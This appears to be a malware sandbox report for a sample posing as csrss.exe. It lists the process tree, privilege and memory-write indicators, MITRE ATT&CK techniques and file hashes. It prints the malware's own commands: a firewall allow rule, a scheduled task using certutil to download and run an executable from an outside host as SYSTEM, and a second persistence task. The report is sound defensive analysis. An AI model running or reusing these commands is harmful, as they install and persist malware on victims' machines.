1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	csrss.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.execsrss.exe

pid	process
4836	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4836	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
1224	csrss.exe
1224	csrss.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	4836	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
Token: SeImpersonatePrivilege	4836	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
Token: SeTcbPrivilege	3440	svchost.exe
Token: SeTcbPrivilege	3440	svchost.exe
Token: SeBackupPrivilege	3440	svchost.exe
Token: SeRestorePrivilege	3440	svchost.exe
Token: SeBackupPrivilege	3440	svchost.exe
Token: SeRestorePrivilege	3440	svchost.exe
Token: SeBackupPrivilege	3440	svchost.exe
Token: SeRestorePrivilege	3440	svchost.exe
Token: SeBackupPrivilege	3440	svchost.exe
Token: SeRestorePrivilege	3440	svchost.exe
Token: SeSystemEnvironmentPrivilege	1224	csrss.exe
Token: SeBackupPrivilege	3440	svchost.exe
Token: SeRestorePrivilege	3440	svchost.exe
Token: SeBackupPrivilege	3440	svchost.exe
Token: SeRestorePrivilege	3440	svchost.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

svchost.exe39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exeWerFault.execsrss.exe

description	pid	process	target process
PID 3440 wrote to memory of 5084	3440	svchost.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
PID 3440 wrote to memory of 5084	3440	svchost.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
PID 3440 wrote to memory of 5084	3440	svchost.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
PID 5084 wrote to memory of 3392	5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe	WerFault.exe
PID 5084 wrote to memory of 3392	5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe	WerFault.exe
PID 3392 wrote to memory of 4552	3392	WerFault.exe	WerFault.exe
PID 3392 wrote to memory of 4552	3392	WerFault.exe	WerFault.exe
PID 5084 wrote to memory of 1224	5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe	csrss.exe
PID 5084 wrote to memory of 1224	5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe	csrss.exe
PID 5084 wrote to memory of 1224	5084	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe	csrss.exe
PID 3440 wrote to memory of 4976	3440	svchost.exe	schtasks.exe
PID 3440 wrote to memory of 4976	3440	svchost.exe	schtasks.exe
PID 3440 wrote to memory of 1472	3440	svchost.exe	schtasks.exe
PID 3440 wrote to memory of 1472	3440	svchost.exe	schtasks.exe
PID 3440 wrote to memory of 1704	3440	svchost.exe	patch.exe
PID 3440 wrote to memory of 1704	3440	svchost.exe	patch.exe
PID 1224 wrote to memory of 3376	1224	csrss.exe	bcdedit.exe
PID 1224 wrote to memory of 3376	1224	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
"C:\Users\Admin\AppData\Local\Temp\39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 332
2⤵
- Program crash
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 336
2⤵
- Program crash
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 336
2⤵
- Program crash
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 604
2⤵
- Program crash
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 696
2⤵
- Program crash
PID:3136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 716
2⤵
- Program crash
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 712
2⤵
- Program crash
PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 728
2⤵
- Program crash
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 752
2⤵
- Program crash
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 680
2⤵
- Program crash
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 740
2⤵
- Program crash
PID:216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 752
2⤵
- Program crash
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 844
2⤵
- Program crash
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 800
2⤵
- Program crash
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 720
2⤵
- Program crash
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 780
2⤵
- Program crash
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 720
2⤵
- Program crash
PID:3196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 844
2⤵
- Program crash
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 840
2⤵
- Program crash
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 748
2⤵
- Program crash
PID:5068

C:\Users\Admin\AppData\Local\Temp\39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
"C:\Users\Admin\AppData\Local\Temp\39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe"
2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 296
3⤵
- Program crash
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 300
3⤵
- Program crash
PID:804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 324
3⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 576
3⤵
- Program crash
PID:2772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 676
3⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 676
3⤵
- Program crash
PID:2476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 708
3⤵
- Program crash
PID:3292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 716
3⤵
- Program crash
PID:3416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 724
3⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 668
3⤵
- Program crash
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 628
3⤵
- Program crash
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:3392

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 612
3⤵
- Program crash
PID:928

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 332
4⤵
- Program crash
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 356
4⤵
- Program crash
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 356
4⤵
- Program crash
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 680
4⤵
- Program crash
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 680
4⤵
- Program crash
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 680
4⤵
- Program crash
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 680
4⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 744
4⤵
- Program crash
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 760
4⤵
- Program crash
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 884
4⤵
- Program crash
PID:2804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 792
4⤵
- Program crash
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 912
4⤵
- Program crash
PID:4784

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 928
4⤵
- Program crash
PID:1416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 928
4⤵
- Program crash
PID:1608

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1004
4⤵
- Program crash
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 992
4⤵
- Program crash
PID:204

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:3376

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 988
4⤵
- Program crash
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1536
4⤵
- Program crash
PID:1788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 952
4⤵
- Program crash
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1528
4⤵
- Program crash
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 656
4⤵
- Program crash
PID:3732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1576
4⤵
- Program crash
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1588
4⤵
- Program crash
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1592
4⤵
- Program crash
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1612
4⤵
- Program crash
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 656
4⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1652
4⤵
- Program crash
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1540
4⤵
- Program crash
PID:1488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1676
4⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1840
4⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1716
4⤵
- Program crash
PID:2648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 456
4⤵
- Program crash
PID:2536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1900
4⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1888
4⤵
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4836 -ip 4836
1⤵
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4836 -ip 4836
1⤵
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4836 -ip 4836
1⤵
PID:1944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4836 -ip 4836
1⤵
PID:520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4836 -ip 4836
1⤵
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 4836 -ip 4836
1⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4836 -ip 4836
1⤵
PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4836 -ip 4836
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4836 -ip 4836
1⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4836 -ip 4836
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4836 -ip 4836
1⤵
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4836 -ip 4836
1⤵
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4836 -ip 4836
1⤵
PID:3156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4836 -ip 4836
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4836 -ip 4836
1⤵
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4836 -ip 4836
1⤵
PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4836 -ip 4836
1⤵
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4836 -ip 4836
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4836 -ip 4836
1⤵
PID:3380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4836 -ip 4836
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5084 -ip 5084
1⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5084 -ip 5084
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5084 -ip 5084
1⤵
PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5084 -ip 5084
1⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5084 -ip 5084
1⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5084 -ip 5084
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5084 -ip 5084
1⤵
PID:528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084
1⤵
PID:1976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5084 -ip 5084
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5084 -ip 5084
1⤵
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5084 -ip 5084
1⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5084 -ip 5084
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1224 -ip 1224
1⤵
PID:5116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1224 -ip 1224
1⤵
PID:1064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 1224 -ip 1224
1⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1224 -ip 1224
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1224 -ip 1224
1⤵
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1224 -ip 1224
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1224 -ip 1224
1⤵
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 1224 -ip 1224
1⤵
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1224 -ip 1224
1⤵
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1224 -ip 1224
1⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1224 -ip 1224
1⤵
PID:392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1224 -ip 1224
1⤵
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1224 -ip 1224
1⤵
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 1224 -ip 1224
1⤵
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 1224 -ip 1224
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1224 -ip 1224
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 1224 -ip 1224
1⤵
PID:2228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1224 -ip 1224
1⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1224 -ip 1224
1⤵
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1224 -ip 1224
1⤵
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1224 -ip 1224
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1224 -ip 1224
1⤵
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1224 -ip 1224
1⤵
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1224 -ip 1224
1⤵
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1224 -ip 1224
1⤵
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1224 -ip 1224
1⤵
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1224 -ip 1224
1⤵
- Suspicious use of WriteProcessMemory
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1224 -ip 1224
1⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1224 -ip 1224
1⤵
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1224 -ip 1224
1⤵
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1224 -ip 1224
1⤵
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1224 -ip 1224
1⤵
PID:680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1224 -ip 1224
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1224 -ip 1224
1⤵
PID:4392

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
d2953d9b8f72ed45bf0b493c2fdc6b03

SHA1
4e5eded5b11877e20251aa2c4f63a7b001cb0142

SHA256
39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435

SHA512
ca1dc47ead2c3dfea0fd4d431ab87fb3f4a4d68522a55f1cae18a6440e6d301e1f7268bad9503c8f4ddfeb50b579c6fd7715f2d576d09c786339cc8c108534f0

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
d2953d9b8f72ed45bf0b493c2fdc6b03

SHA1
4e5eded5b11877e20251aa2c4f63a7b001cb0142

SHA256
39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435

SHA512
ca1dc47ead2c3dfea0fd4d431ab87fb3f4a4d68522a55f1cae18a6440e6d301e1f7268bad9503c8f4ddfeb50b579c6fd7715f2d576d09c786339cc8c108534f0

Download Submit
memory/1224-144-0x0000000000000000-mapping.dmp

Download
memory/1224-149-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/1224-148-0x0000000001400000-0x00000000017A8000-memory.dmp

Filesize
3.7MB

Download
memory/1224-155-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/1472-151-0x0000000000000000-mapping.dmp

Download
memory/1704-152-0x0000000000000000-mapping.dmp

Download
memory/3376-154-0x0000000000000000-mapping.dmp

Download
memory/3392-142-0x0000000000000000-mapping.dmp

Download
